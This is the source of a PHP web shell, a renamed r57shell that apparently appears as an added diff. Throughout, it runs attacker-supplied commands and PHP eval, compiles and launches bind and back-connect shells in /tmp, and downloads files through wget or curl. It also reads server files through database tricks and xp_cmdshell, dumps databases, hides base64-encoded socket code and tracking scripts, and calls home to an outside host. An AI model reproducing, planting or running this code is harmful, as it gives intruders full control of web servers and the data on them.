+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#006699 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6 color="#00FF00"><b>!</b></font><b>'.ws(2).'edu_loco '.$version.'</b> +</font></td><td bgcolor=#006699><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo 